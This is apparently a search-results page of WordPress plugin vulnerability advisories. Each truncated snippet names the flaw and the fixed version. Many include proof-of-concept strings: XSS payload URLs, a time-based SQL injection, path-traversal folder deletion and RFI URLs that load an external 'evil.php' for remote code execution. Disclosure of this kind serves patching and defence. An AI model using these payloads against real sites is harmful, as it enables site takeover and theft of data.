4359 matches found
Asgaros Forum < 1.15.15 - Admin+ SQL Injection via forum_id
The plugin does not validate or escape the forumid parameter before using it in a SQL statement when editing a forum, leading to an SQL injection issue POST /wp-admin/admin.php?page=asgarosforum-structure HTTP/1.1 Accept:...
Five Star Restaurant Reservations < 2.4.8 - Subscriber+ Stored Cross-Site Scripting
The plugin does not have capability and CSRF checks in the rtbwelcomesetschedule AJAX action, allowing any authenticated users to call it. Due to the lack of sanitisation and escaping, users with a role as low as subscriber could perform Cross-Site Scripting attacks against logged in admins As a...
Simple Download Monitor < 3.9.11 - Contributor+ Stored Cross-Site Scripting via Shortcodes
The plugin could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attack via 1 "color" or "cssclass" argument of sdmdownload shortcode, 2 "class" or "placeholder" argument of sdmsearchform shortcode. // all spaces must be replaced with a slash sdmdownload...
Backup and Staging by WP Time Capsule < 1.22.7 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the error parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting Once the "Server Requirements" are passed in the initial setup process you can bypass the check for localhosts by editing the islocalhost function in...
Simple Download Monitor < 3.9.9 - Multiple CSRF
The plugin does not enforce nonce checks, which could allow attackers to perform CSRF attacks to 1 make admins export logs to exploit a separate log disclosure vulnerability fixed in 3.9.6, 2 delete logs fixed in 3.9.9, 3 remove thumbnail image from downloads To export logs which could then be...
Event Calendar < 1.1.51 - Reflected Cross-Site Scripting
The plugin does not escape some user input before outputting it back in attributes, leading to Reflected Cross-SIte Scripting issues And move the mouse over the 'Untitled' text Firefox only:...
ACF Photo Gallery Field < 1.7.5 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the post parameter in the includes/acfphotogallerymetaboxedit.php file before outputing back in an attribute, leading to a Reflected Cross-Site Scripting issue...
Profile Extra Fields < 1.2.4 - Reflected Cross-Site Scripting
The plugin does not escape the role parameter when outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/admin.php?page=profile-extra-fields.php&tab-action=userdata&role="alert/XSS/...
AnyComment <= 0.3.1 - Open Redirect
The plugin has an API endpoint which passes user input via the redirect parameter to the wpredirect function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature...
Event Calendar < 1.1.51 - Subscriber+ Event Creation
The plugin does not have proper authorisation and CSRF checks in the addcalendarevent AJAX actions, allowing users with a role as low as subscriber to create events Adding calendar events: fetch"https://example.com/wp-admin/admin-ajax.php", "headers": "content-type":...
SEUR Oficial < 1.7.0 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitize and escape some of its settings allowing high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Put the following payload in one of the plugin's settings: "alert'XSS'; Affected files:...
Tabs < 3.6.0 - Unauthenticated Arbitrary Option Update
The plugin does not have any authorisation in its REST API endpoint, one of them could allow unauthenticated attackers to update arbitrary blog options...
Smash Balloon Social Post Feed < 4.1.1 - Authenticated Reflected Cross-Site Scripting (XSS)
The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page. http://127.0.0.1:8001/wp-admin/admin.php?page=cff-top&cffaccesstoken=xox%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3E&cfffinalresponse=true...
Landing Page Builder < 1.4.9.6 - Authenticated Reflected Cross-Site Scripting (XSS)
The plugin was affected by a reflected XSS in page-builder-add on the ulpbpost admin page. http://127.0.0.1:8001/wp-admin/edit.php?posttype=ulpbpost&page=page-builder-new-landing-page&thisPostID="+style=animation-name:rotation+onanimationstart=alert1+x=...
Image Hover Effects Ultimate < 9.7.0 - Unauthenticated Arbitrary Option Update
The plugin does not have any authorisation in its REST API endpoint, one of them could allow unauthenticated attackers to update arbitrary blog options. The original report mentioned the issue being fixed in 9.6.2, however it was still possible for attackers to exploit it and proper remediation h...
True Ranker < 2.2.4 - Unauthenticated Arbitrary File Access via Path Traversal
The plugin allows arbitrary files, including sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the /admin/vendor/datatables/examples/resources/examples.php file. Exploit Authors: Nicole Sheinin, Liad Levy Tested on: MacOS !/usr/bin/env python3 impo...
WOOCS < 1.3.7.3 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the customprices parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/admin-ajax.php?action=woocsgetcustompricehtml&customprices=%3Cimg%20src%20onerror=alertXSS%3E...
The Plus Addons for Elementor Pro < 5.0.7 - Sensitive Data Disclosure
The plugin does not validate the qvquery parameter of the tpgetdlpostinfoajax AJAX action, which could allow unauthenticated users to retrieve sensitive information, such as private and draft posts The following request allow an unauthenticated user to get the draft posts the nonce can be retriev...
The Plus Addons for Elementor Pro < 5.0.7 - Unauthenticated SQL Injection
The "WP Search Filters" widget of the plugin does not sanitise and escape the option parameter before using it in a SQL statement, which could lead to SQL injection The request requires a nonce created with wpcreatenonce"theplus-searchfilter” which can be retrieved from a page where the widget is...
WP Booking System – Booking Calendar < 2.0.15 - Authenticated Reflected Cross-Site Scripting (XSS)
The plugin was affected by a reflected xss in wp-booking-system on the wpbs-calendars admin page. http://127.0.0.1:8001/wp-admin/admin.php?page=wpbs-calendars&s=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%281%29+x%3D or...
Accept Donations with PayPal < 1.3.4 - Arbitrary Post Deletion via CSRF
The plugin does not have CSRF check in place and does not ensure that the post to be deleted belongs to the plugin, allowing attackers to make a logged in admin delete arbitrary posts from the blog https://examle.com/wp-admin/admin.php?page=wpedonmenu&action=delete&action2=delete&order=1...
WP Google Map < 1.8.1 - Subscriber+ Arbitrary Post Deletion and Plugin's Settings Update
The plugin does not have proper authorisation and CSRF in most of its AJAX actions, which could allow any authenticated users, such as subscriber to delete arbitrary posts and update the plugin's settings. v1.8.1 added authorisation checks, however CSRF was still missing and a separate advisory h...
PublishPress Capabilities < 2.3.1 - Unauthenticated Arbitrary Options Update to Blog Compromise
The plugin does not have authorisation and CSRF checks when updating the plugin's settings via the init hook, and does not ensure that the options to be updated belong to the plugin. As a result, unauthenticated attackers could update arbitrary blog options, such as the default role and make any...
10Web Social Photo Feed < 1.4.29 - Reflected Cross-Site Scripting (XSS)
The plugin was affected by a reflected Cross-Site Scripting XSS vulnerability in the wdiapplychanges admin page, allowing an attacker to perform such attack against any logged in users...
WooCommerce PDF Invoices & Packing Slips < 2.10.5 - Reflected Cross-Site Scripting
The plugin does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard...
Events Made Easy < 2.2.36 - Subscriber+ SQL Injection
The plugin does not sanitise and escape the searchtext parameter before using it in a SQL statement via the emesearchmail AJAX action, available to any authenticated users. As a result, users with a role as low as subscriber can call it and perform SQL injection attacks...
Booking Calendar < 8.9.2 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the bookingtype parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting https://example.com/wp-admin/admin.php?page=wpbc&bookingtype=%22%3E%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E%3Cscript%3E%2F%2A...
WPcalc <= 2.1 - Authenticated SQL Injection
The plugin does not sanitize user input into the 'did' parameter and uses it in a SQL statement, leading to an authenticated SQL Injection vulnerability. Plugin author closed the plugin. http://www.example.com/wp-admin/admin.php?page=wpcalc&info=del&did=1 AND SELECT 7156 FROM SELECTSLEEP5MIkl or,...
Multivendor Marketplace Solution for WooCommerce < 3.8.4 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape user input before outputting it back in HTML attributes, leading to Reflected Cross-Site Scripting issues https://example.com/wp-admin/admin.php?page=wcmp-setting-admin&tab=vendor'alert/XSS/...
Tab - Accordion, FAQ < 1.3.2 - Unauthenticated AJAX Calls
All AJAX actions of the plugin are available to both unauthenticated and authenticated users, allowing unauthenticated attackers to modify various data in the plugin, such as add/edit/delete arbitrary tabs. v1.3.0 added CSRF checks, however authorisation was still missing and has been added in...
PowerPack Addons for Elementor < 2.6.2 - Reflected Cross-Site Scripting
The plugin does not escape the tab parameter before outputting it back in an attribute in the admin dashboard, leading to a Reflected Cross-Site Scripting issue...
Stars Rating < 3.5.1 - Comments Denial of Service
The plugin does not validate the submitted rating, allowing submission of long integer, causing a Denial of Service in the comments section, or pending comment dashboard depending if the user sent it as unauthenticated or authenticated. Enable rating for a post/page, add a comment, capture the...
UpdraftPlus < 1.16.66 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape the backuptimestamp and jobid parameter before outputting then back in admin pages, leading to Reflected Cross-Site Scripting issues...
Chaty Free < 2.8.3 & Pro < 2.8.2 - Reflected Cross-Site Scripting
The plugins do not sanitise and escape the search parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting http://example.com/wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E...
Site Reviews < 5.17.3 - Unauthenticated Stored Cross-Site Scripting
The plugin does not sanitise and escape the site-reviews parameter of the glsraction AJAX action available to unauthenticated and any authenticated users, allowing them to perform Cross-Site Scripting attacks against logged in admins viewing the Tool dashboard of the plugin...
Modal Window < 5.2.2 - RFI leading to RCE via CSRF
The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...
Button Generator < 2.3.3 - RFI leading to RCE via CSRF
The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...
WP Coder < 2.5.2 - RFI leading to RCE via CSRF
The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...
Modern Events Calendar Lite < 6.2.0 - Subscriber+ Category Add Leading to Stored XSS
The plugin alloed any logged-in user, even a subscriber user, may add a category whose parameters are incorrectly escaped in the admin panel, leading to stored XSS. 1. Run the following JavaScript in the browser's web console as a subscriber user. 2. Authenticate in a separate browser as an admin...
Post Duplicator < 2.27 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape its Duplicate Title and Slug settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Put the following payload in the "Duplicate Title" or "Duplicate Slug"...
WP Travel Engine < 5.3.1 - Editor+ Stored Cross-Site Scripting
The plugin does not escape the Description field in the Trip Destination/Activities/Trip Type and Pricing Category pages, allowing users with a role as low as editor to perform Stored Cross-Site Scripting attacks, even when the unfilteredhtml capability is disallowed As an editor or admin, add or...
CAOS < 4.1.9 - Admin+ Arbitrary Folder Deletion via Path Traversal
The plugin does not validate the cache directory setting, allowing high privilege users to use a path traversal vector and delete arbitrary folders when uninstalling the plugin As admin, put the following payload in the "Cache directory for analytics.js" setting of the plugin: ../wp-includes, tic...
OMGF < 4.5.12 - Admin+ Arbitrary Folder Deletion via Path Traversal
The plugin does not validate the cache directory setting, allowing high privilege users to use a path traversal vector and delete arbitrary folders when uninstalling the plugin As admin, put the following payload in the "Fonts Cache Directory" setting of the plugin: ../wp-includes, tick the "Remo...
Booster for WooCommerce < 5.4.9 - Reflected Cross-Site Scripting in Product XML Feeds Module
The plugin does not sanitise and escape the wcjcreateproductsxmlresult parameter before outputting back in the admin dashboard when the Product XML Feeds module is enabled, leading to a Reflected Cross-Site Scripting issue The "Product XML Feeds" module needs to be enabled in "Woocommerce - Boost...
Booster for WooCommerce < 5.4.9 - Reflected Cross-Site Scripting in General Module
The plugin does not sanitise and escape the wcjdeleterole parameter before outputting back in the admin dashboard when the General module is enabled, leading to a Reflected Cross-Site Scripting issue The "General" module needs to be enabled in "Woocommerce - Booster Settings - Booster"...
Booster for Woocommerce < 5.4.9 - Reflected Cross-Site Scripting in PDF Invoicing Module
The plugin does not sanitise and escape the wcjnotice parameter before outputting it back in the admin dashboard when the Pdf Invoicing module is enabled, leading to a Reflected Cross-Site Scripting With the PDF Invoicing module active:...
LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS
The plugin does not properly verify that requests are coming from QUIC.cloud servers, allowing attackers to make requests to certain endpoints by using a specific X-Forwarded-For header value. In addition, one of the endpoint could be used to set CSS code if a setting is enabled, which will then ...
LiteSpeed Cache < 4.4.4 - Admin+ Reflected Cross-Site Scripting
The plugin does not escape the qcres parameter before outputting it back in the JS code of an admin page, leading to a Reflected Cross-Site Scripting As admin, enter the following payload in the Domain Key setting of the plugin: Then open...
Video Conferencing with Zoom < 3.8.16 - Reflected Cross-Site Scripting
The plugin does not sanitise and escape user data before outputting it back in attributes in some admin pages, leading to Reflected Cross-Site Scripting issues https://example.com/wp-admin/edit.php?posttype=zoom-meetings&page=zoom-video-conferencing&hostid="alert/XSS/...
Buttonizer - Smart Floating Action Button < 2.5.5 - Admin+ Stored Cross-Site Scripting
The plugin does not sanitise and escape some parameter before outputting them in attributes and page, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. Add/edit a new button, set its Button action to "Website URL"...